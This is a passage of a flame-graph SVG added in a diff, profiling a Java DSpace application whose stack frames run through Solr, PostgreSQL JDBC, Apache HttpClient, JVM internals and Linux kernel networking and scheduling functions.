+<text  x="550.34" y="783.5" ></text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.09%)</title><rect x="421.6" y="709" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="719.5" ></text>
+</g>
+<g >
+<title>sun/reflect/NativeMethodAccessorImpl:::invoke (747 samples, 68.03%)</title><rect x="372.2" y="1157" width="802.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="375.17" y="1167.5" >sun/reflect/NativeMethodAccessorImpl:::invoke</text>
+</g>
+<g >
+<title>x86_pmu_disable (1 samples, 0.09%)</title><rect x="100.3" y="1045" width="1.0" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="103.27" y="1055.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::wasNull (1 samples, 0.09%)</title><rect x="593.6" y="965" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="596.55" y="975.5" ></text>
+</g>
+<g >
+<title>__ip_finish_output (108 samples, 9.84%)</title><rect x="228.2" y="1029" width="116.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="231.16" y="1039.5" >__ip_finish_ou..</text>
+</g>
+<g >
+<title>switch_fpu_return (3 samples, 0.27%)</title><rect x="139.0" y="1269" width="3.2" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="141.96" y="1279.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.09%)</title><rect x="871.9" y="933" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="874.89" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::getBackoffManager (1 samples, 0.09%)</title><rect x="1120.1" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1123.15" y="975.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (4 samples, 0.36%)</title><rect x="820.3" y="869" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="879.5" ></text>
+</g>
+<g >
+<title>select_task_rq_fair (3 samples, 0.27%)</title><rect x="254.0" y="629" width="3.2" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="256.95" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (8 samples, 0.73%)</title><rect x="1080.4" y="917" width="8.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1083.38" y="927.5" ></text>
+</g>
+<g >
+<title>JVM_GetDeclaringClass (1 samples, 0.09%)</title><rect x="631.2" y="869" width="1.0" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="634.17" y="879.5" ></text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="387.2" y="917" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="390.21" y="927.5" ></text>
+</g>
+<g >
+<title>__vfs_write (2 samples, 0.18%)</title><rect x="409.8" y="677" width="2.1" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="412.78" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (3 samples, 0.27%)</title><rect x="536.6" y="869" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="539.59" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="737.6" y="805" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="740.56" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (2 samples, 0.18%)</title><rect x="1124.4" y="965" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1127.44" y="975.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="804.2" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.19" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="784.8" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="787.85" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (3 samples, 0.27%)</title><rect x="867.6" y="949" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="959.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.18%)</title><rect x="461.4" y="853" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="464.37" y="863.5" ></text>
+</g>
+<g >
+<title>__vfs_write (1 samples, 0.09%)</title><rect x="1139.5" y="773" width="1.1" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="1142.49" y="783.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (2 samples, 0.18%)</title><rect x="716.1" y="773" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="719.07" y="783.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="735.4" y="709" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="738.41" y="719.5" ></text>
+</g>
+<g >
+<title>schedule (1 samples, 0.09%)</title><rect x="696.7" y="805" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="699.72" y="815.5" ></text>
+</g>
+<g >
+<title>Interpreter (745 samples, 67.85%)</title><rect x="374.3" y="1013" width="800.7" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="377.32" y="1023.5" >Interpreter</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (3 samples, 0.27%)</title><rect x="917.0" y="725" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="735.5" ></text>
+</g>
+<g >
+<title>ext4_mark_iloc_dirty (1 samples, 0.09%)</title><rect x="1139.5" y="613" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1142.49" y="623.5" ></text>
+</g>
+<g >
+<title>exit_to_usermode_loop (1 samples, 0.09%)</title><rect x="137.9" y="1269" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="140.89" y="1279.5" ></text>
+</g>
+<g >
+<title>update_load_avg (1 samples, 0.09%)</title><rect x="106.7" y="1061" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="109.72" y="1071.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="740.8" y="725" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="743.78" y="735.5" ></text>
+</g>
+<g >
+<title>sk_page_frag_refill (1 samples, 0.09%)</title><rect x="173.4" y="1173" width="1.0" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="176.35" y="1183.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingletonNames (1 samples, 0.09%)</title><rect x="1014.8" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1017.83" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%)</title><rect x="791.3" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.29" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (3 samples, 0.27%)</title><rect x="763.4" y="949" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="766.35" y="959.5" ></text>
+</g>
+<g >
+<title>_copy_from_iter_full (2 samples, 0.18%)</title><rect x="170.1" y="1173" width="2.2" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="173.13" y="1183.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestDefaultHeaders:::process (1 samples, 0.09%)</title><rect x="1114.8" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1117.77" y="927.5" ></text>
+</g>
+<g >
+<title>account_entity_enqueue (2 samples, 0.18%)</title><rect x="261.5" y="565" width="2.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="264.48" y="575.5" ></text>
+</g>
+<g >
+<title>enqueue_entity (2 samples, 0.18%)</title><rect x="261.5" y="581" width="2.1" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="264.48" y="591.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (3 samples, 0.27%)</title><rect x="917.0" y="757" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="767.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::sequence (6 samples, 0.55%)</title><rect x="925.6" y="805" width="6.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="928.63" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="749.4" y="917" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/Calendar:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="1135.2" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1138.19" y="959.5" ></text>
+</g>
+<g >
+<title>blk_mq_end_request (1 samples, 0.09%)</title><rect x="137.9" y="1045" width="1.1" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="140.89" y="1055.5" ></text>
+</g>
+<g >
+<title>__fsnotify_parent (1 samples, 0.09%)</title><rect x="1138.4" y="773" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1141.42" y="783.5" ></text>
+</g>
+<g >
+<title>inet6_recvmsg (1 samples, 0.09%)</title><rect x="88.5" y="1237" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="91.45" y="1247.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.18%)</title><rect x="1082.5" y="901" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1085.53" y="911.5" ></text>
+</g>
+<g >
+<title>psi_task_change (7 samples, 0.64%)</title><rect x="263.6" y="597" width="7.5" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="266.62" y="607.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="964.3" y="901" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="967.32" y="911.5" ></text>
+</g>
+<g >
+<title>ttwu_do_activate (14 samples, 1.28%)</title><rect x="258.3" y="629" width="15.0" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="261.25" y="639.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_defrag (1 samples, 0.09%)</title><rect x="204.5" y="1045" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="207.52" y="1055.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.18%)</title><rect x="1157.8" y="869" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.76" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::cache (1 samples, 0.09%)</title><rect x="754.8" y="949" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="757.75" y="959.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="762.3" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="765.28" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/Header:::addField (12 samples, 1.09%)</title><rect x="389.4" y="917" width="12.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="392.36" y="927.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.09%)</title><rect x="709.6" y="805" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="712.62" y="815.5" ></text>
+</g>
+<g >
+<title>JNU_ThrowByName (7 samples, 0.64%)</title><rect x="1092.2" y="869" width="7.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1095.20" y="879.5" ></text>
+</g>
+<g >
+<title>__wake_up_common_lock (1 samples, 0.09%)</title><rect x="137.9" y="757" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="140.89" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (49 samples, 4.46%)</title><rect x="471.0" y="885" width="52.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="474.04" y="895.5" >org/a..</text>
+</g>
+<g >
+<title>rcu_gp_kthread_wake (1 samples, 0.09%)</title><rect x="964.3" y="789" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="967.32" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="808.5" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="811.49" y="879.5" ></text>
+</g>
+<g >
+<title>ip_rcv (1 samples, 0.09%)</title><rect x="331.3" y="885" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="334.33" y="895.5" ></text>
+</g>
+<g >
+<title>tcp_event_data_recv (1 samples, 0.09%)</title><rect x="287.3" y="741" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="290.27" y="751.5" ></text>
+</g>
+<g >
+<title>psi_task_change (1 samples, 0.09%)</title><rect x="1110.5" y="693" width="1.0" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="1113.47" y="703.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.09%)</title><rect x="1078.2" y="101" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="111.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.09%)</title><rect x="615.0" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="618.05" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/BasicHttpContext:::setAttribute (1 samples, 0.09%)</title><rect x="554.9" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="557.86" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/sort/OrderFormat:::makeSortString (4 samples, 0.36%)</title><rect x="723.6" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="726.59" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.36%)</title><rect x="416.2" y="757" width="4.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="419.23" y="767.5" ></text>
+</g>
+<g >
+<title>sk_filter_trim_cap (2 samples, 0.18%)</title><rect x="238.9" y="789" width="2.2" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="241.91" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="826.8" y="853" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="829.76" y="863.5" ></text>
+</g>
+<g >
+<title>sun/reflect/NativeMethodAccessorImpl:::invoke0 (747 samples, 68.03%)</title><rect x="372.2" y="1141" width="802.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="375.17" y="1151.5" >sun/reflect/NativeMethodAccessorImpl:::invoke0</text>
+</g>
+<g >
+<title>java/lang/String:::equals (1 samples, 0.09%)</title><rect x="795.6" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="798.59" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$LastNode:::match (1 samples, 0.09%)</title><rect x="717.1" y="693" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="720.14" y="703.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::populateBean (2 samples, 0.18%)</title><rect x="933.2" y="885" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="936.15" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="760.1" y="901" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="911.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_state_process (1 samples, 0.09%)</title><rect x="1078.2" y="229" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="239.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (747 samples, 68.03%)</title><rect x="372.2" y="1285" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1295.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="662.3" y="773" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="665.33" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="571.0" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="573.98" y="911.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (3 samples, 0.27%)</title><rect x="409.8" y="757" width="3.2" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="412.78" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::&lt;init&gt; (6 samples, 0.55%)</title><rect x="402.3" y="933" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="405.26" y="943.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%)</title><rect x="834.3" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="837.28" y="831.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (2 samples, 0.18%)</title><rect x="835.4" y="933" width="2.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="838.36" y="943.5" ></text>
+</g>
+<g >
+<title>scheduler_tick (1 samples, 0.09%)</title><rect x="436.6" y="693" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="439.65" y="703.5" ></text>
+</g>
+<g >
+<title>__wake_up_common (21 samples, 1.91%)</title><rect x="251.8" y="693" width="22.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="254.80" y="703.5" >_..</text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.09%)</title><rect x="421.6" y="661" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="424.60" y="671.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 0.64%)</title><rect x="1101.9" y="693" width="7.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1104.88" y="703.5" ></text>
+</g>
+<g >
+<title>_IO_default_xsputn (1 samples, 0.09%)</title><rect x="78.8" y="1317" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="81.78" y="1327.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getStream (7 samples, 0.64%)</title><rect x="523.7" y="917" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="526.70" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.18%)</title><rect x="848.3" y="837" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="851.25" y="847.5" ></text>
+</g>
+<g >
+<title>__wake_up_bit (1 samples, 0.09%)</title><rect x="137.9" y="789" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="140.89" y="799.5" ></text>
+</g>
+<g >
+<title>JVM_InvokeMethod (747 samples, 68.03%)</title><rect x="372.2" y="1125" width="802.8" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="375.17" y="1135.5" >JVM_InvokeMethod</text>
+</g>
+<g >
+<title>release_sock (1 samples, 0.09%)</title><rect x="165.8" y="1189" width="1.1" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="168.83" y="1199.5" ></text>
+</g>
+<g >
+<title>__tcp_send_ack.part.0 (1 samples, 0.09%)</title><rect x="134.7" y="1157" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="137.66" y="1167.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::study (3 samples, 0.27%)</title><rect x="921.3" y="773" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="783.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.09%)</title><rect x="436.6" y="773" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="439.65" y="783.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range_clock (6 samples, 0.55%)</title><rect x="547.3" y="709" width="6.5" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="550.34" y="719.5" ></text>
+</g>
+<g >
+<title>nft_lookup_eval (1 samples, 0.09%)</title><rect x="301.2" y="789" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="304.24" y="799.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="884.8" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="847.5" ></text>
+</g>
+<g >
+<title>acpi_os_read_port (1 samples, 0.09%)</title><rect x="790.2" y="597" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="607.5" ></text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.09%)</title><rect x="130.4" y="1109" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="133.36" y="1119.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (1 samples, 0.09%)</title><rect x="11.1" y="1285" width="1.0" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="14.07" y="1295.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (38 samples, 3.46%)</title><rect x="423.8" y="917" width="40.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="426.75" y="927.5" >org..</text>
+</g>
+<g >
+<title>ip_local_out (1 samples, 0.09%)</title><rect x="1078.2" y="133" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="143.5" ></text>
+</g>
+<g >
+<title>tcp_push (1 samples, 0.09%)</title><rect x="166.9" y="1189" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="169.90" y="1199.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (1 samples, 0.09%)</title><rect x="1078.2" y="565" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1081.23" y="575.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="220.6" y="965" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="223.64" y="975.5" ></text>
+</g>
+<g >
+<title>do_sys_poll (3 samples, 0.27%)</title><rect x="1109.4" y="805" width="3.2" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1112.40" y="815.5" ></text>
+</g>
+<g >
+<title>wake_bit_function (1 samples, 0.09%)</title><rect x="137.9" y="725" width="1.1" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="140.89" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.36%)</title><rect x="824.6" y="933" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="827.61" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (5 samples, 0.46%)</title><rect x="415.2" y="773" width="5.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="418.15" y="783.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (61 samples, 5.56%)</title><rect x="13.2" y="1157" width="65.6" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="16.22" y="1167.5" >finish_..</text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::generateMdBits (2 samples, 0.18%)</title><rect x="903.1" y="853" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="906.06" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (10 samples, 0.91%)</title><rect x="409.8" y="885" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="412.78" y="895.5" ></text>
+</g>
+<g >
+<title>iptable_mangle_hook (1 samples, 0.09%)</title><rect x="203.4" y="1045" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="206.44" y="1055.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.09%)</title><rect x="1073.9" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1076.93" y="943.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Branch:::match (2 samples, 0.18%)</title><rect x="716.1" y="741" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="719.07" y="751.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getBooleanColumn (1 samples, 0.09%)</title><rect x="1041.7" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1044.69" y="975.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (5 samples, 0.46%)</title><rect x="877.3" y="933" width="5.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="880.27" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="838.6" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="841.58" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.18%)</title><rect x="848.3" y="853" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="851.25" y="863.5" ></text>
+</g>
+<g >
+<title>record_times (1 samples, 0.09%)</title><rect x="270.1" y="581" width="1.0" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="273.07" y="591.5" ></text>
+</g>
+<g >
+<title>tick_sched_handle (1 samples, 0.09%)</title><rect x="436.6" y="725" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="439.65" y="735.5" ></text>
+</g>
+<g >
+<title>sk_wait_data (32 samples, 2.91%)</title><rect x="98.1" y="1189" width="34.4" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="101.12" y="1199.5" >sk..</text>
+</g>
+<g >
+<title>org/apache/http/entity/HttpEntityWrapper:::isChunked (1 samples, 0.09%)</title><rect x="463.5" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="466.52" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="740.8" y="885" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="895.5" ></text>
+</g>
+<g >
